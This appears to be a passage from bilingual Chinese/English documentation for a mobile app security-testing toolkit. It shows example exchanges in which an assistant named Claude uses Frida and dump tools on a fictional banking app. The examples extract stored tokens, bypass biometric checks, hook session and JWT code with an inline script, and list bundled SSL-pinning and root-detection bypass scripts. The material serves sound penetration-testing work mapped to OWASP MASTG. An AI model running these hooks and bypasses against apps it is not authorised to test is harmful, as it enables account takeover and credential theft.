| Unencrypted SQLite database | High | MASTG-TEST-0001 |
| PII in plaintext files | Medium | MASTG-TEST-0002 |
| Docs on external storage | Medium | MASTG-TEST-0003 |用户:检查这个应用本地存储了哪些敏感数据
Claude:我将执行全面的数据存储分析。
[执行MCP工具]
1. SharedPreferences分析:
> dump_shared_prefs("com.megabank.mobile")
[!] 发现问题 在auth_prefs.xml中:
- auth_token: "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9..."
- refresh_token: "dGhpcyBpcyBhIHJlZnJlc2ggdG9rZW4..."
- pin_hash: "5e884898da28047d9166..."
严重程度: 高 - 认证令牌以明文存储
MASTG: MASTG-TEST-0001 (不安全数据存储)
2. 数据库分析:
> dump_databases("com.megabank.mobile")
发现: app_data.db (356 KB)
[!] 发现问题:
- 表'accounts': 账号、余额、最后交易记录
- 表'transactions': 847条交易历史记录
- 表'cached_credentials': 用户名、密码哈希
严重程度: 高 - 财务数据存储在未加密数据库中
MASTG: MASTG-TEST-0001
3. 内部存储:
> dump_internal_storage("com.megabank.mobile")
[!] 发现问题: /files/user_profile.json
包含: 全名、邮箱、电话、社保号后4位
严重程度: 中 - 个人身份信息(PII)以明文文件存储
4. 外部存储:
> dump_external_storage("com.megabank.mobile")
[!] 发现问题: /Android/data/com.megabank.mobile/files/exports/
- statements_2024.pdf (全局可读)
严重程度: 中 - 敏感文档存储在外部存储
MASTG: MASTG-TEST-0003
摘要:
| 发现问题 | 严重程度 | MASTG ID |
|---------|----------|----------|
| SharedPreferences中的认证令牌 | 高 | MASTG-TEST-0001 |
| 未加密SQLite数据库 | 高 | MASTG-TEST-0001 |
| 明文文件中的PII | 中 | MASTG-TEST-0002 |
| 外部存储中的敏感文档 | 中 | MASTG-TEST-0003 |Example 3: Authentication Bypass
示例3:认证绕过测试
User: Test the authentication for vulnerabilities
Claude: I'll test authentication mechanisms comprehensively.
[Executes MCP tools]
1. Hooking authentication flow:
> frida_run_script(12345, "credential_hooks.js")
[HOOK] SharedPreferences write: auth_token = eyJ...
[HOOK] HTTP Header: Authorization: Bearer eyJ...
2. Biometric testing:
> frida_run_script(12345, "biometric_bypass.js")
[HOOK] BiometricPrompt.authenticate() called
[BYPASS] Simulating successful authentication
[!] FINDING: Biometric bypass successful
- App accepts fake biometric success callback
- No server-side verification
Severity: HIGH - Authentication bypass
MASTG: MASTG-TEST-0015
3. Session analysis:
> frida_hook_method(12345, "com.megabank.mobile.auth.SessionManager", "*")
[HOOK] validateSession(): Only checks local JWT expiry
[HOOK] refreshSession(): No server round-trip
[!] FINDING: Client-side session validation
- JWT expiry can be modified locally
- Sessions never verified server-side
Severity: HIGH - Broken session management
MASTG: MASTG-TEST-0016
4. Token analysis:
> frida_run_script(12345, """
Java.perform(function() {
var JWT = Java.use('com.auth0.jwt.JWT');
JWT.decode.implementation = function(token) {
console.log('[JWT] ' + token);
return this.decode(token);
};
});
""")
[!] FINDING: JWT uses HS256 (weak algorithm)
[!] FINDING: JWT contains: account_id, role, permissions
Findings Summary:
| Issue | Severity | Impact |
|-------|----------|--------|
| Biometric bypass | High | Full account access |
| Client-side sessions | High | Persistent unauthorized access |
| Weak JWT algorithm | Medium | Potential token forgery |用户:测试这个应用的认证机制是否存在漏洞
Claude:我将全面测试认证机制。
[执行MCP工具]
1. Hook认证流程:
> frida_run_script(12345, "credential_hooks.js")
[HOOK] SharedPreferences写入: auth_token = eyJ...
[HOOK] HTTP Header: Authorization: Bearer eyJ...
2. 生物识别测试:
> frida_run_script(12345, "biometric_bypass.js")
[HOOK] BiometricPrompt.authenticate()被调用
[BYPASS] 模拟认证成功
[!] 发现问题: 生物识别绕过成功
- 应用接受伪造的生物识别成功回调
- 无服务器端验证
严重程度: 高 - 认证绕过
MASTG: MASTG-TEST-0015
3. 会话分析:
> frida_hook_method(12345, "com.megabank.mobile.auth.SessionManager", "*")
[HOOK] validateSession(): 仅检查本地JWT过期时间
[HOOK] refreshSession(): 无服务器端交互
[!] 发现问题: 客户端会话验证
- JWT过期时间可在本地修改
- 会话从未在服务器端验证
严重程度: 高 - 会话管理缺陷
MASTG: MASTG-TEST-0016
4. 令牌分析:
> frida_run_script(12345, """
Java.perform(function() {
var JWT = Java.use('com.auth0.jwt.JWT');
JWT.decode.implementation = function(token) {
console.log('[JWT] ' + token);
return this.decode(token);
};
});
""")
[!] 发现问题: JWT使用HS256(弱算法)
[!] 发现问题: JWT包含: account_id, role, permissions
发现问题摘要:
| 问题 | 严重程度 | 影响 |
|-------|----------|--------|
| 生物识别绕过 | 高 | 完全账号访问权限 |
| 客户端会话验证 | 高 | 持续未授权访问 |
| 弱JWT算法 | 中 | 潜在令牌伪造风险 |Related Resources
相关资源
- OWASP MASTG - Mobile Application Security Testing Guide
- OWASP MASVS - Mobile Application Security Verification Standard
- Frida Documentation - Dynamic instrumentation toolkit
- Android Security Bulletin - Monthly security updates
- OWASP MASTG - 移动应用安全测试指南
- OWASP MASVS - 移动应用安全验证标准
- Frida Documentation - 动态插桩工具包文档
- Android Security Bulletin - 月度安全更新
Bundled Resources
捆绑资源
scripts/
scripts/
- - Universal SSL pinning bypass
ssl_pinning_bypass.js - - Root detection bypass
root_bypass.js - - Crypto operation monitoring
crypto_hooks.js - - Android Keystore hooks
keystore_hooks.js - - Generic method tracing
method_tracer.js - - APK extraction tool
extract_apk.py - - Content provider enumeration
content_provider_scanner.py - - Intent fuzzing automation
intent_fuzzer.py
- - 通用SSL固定绕过
ssl_pinning_bypass.js - - Root检测绕过
root_bypass.js - - 加密操作监控
crypto_hooks.js - - Android Keystore Hook
keystore_hooks.js - - 通用方法跟踪
method_tracer.js - - APK提取工具
extract_apk.py - - Content Provider枚举工具
content_provider_scanner.py - - Intent模糊测试自动化工具
intent_fuzzer.py
references/
references/
- - OWASP Mobile Top 10
owasp_mobile_top10.md - - Testing checklist
android_security_checklist.md - - Common Frida code snippets
frida_snippets.md
- - OWASP移动应用Top 10
owasp_mobile_top10.md - - 测试清单
android_security_checklist.md - - 常见Frida代码片段
frida_snippets.md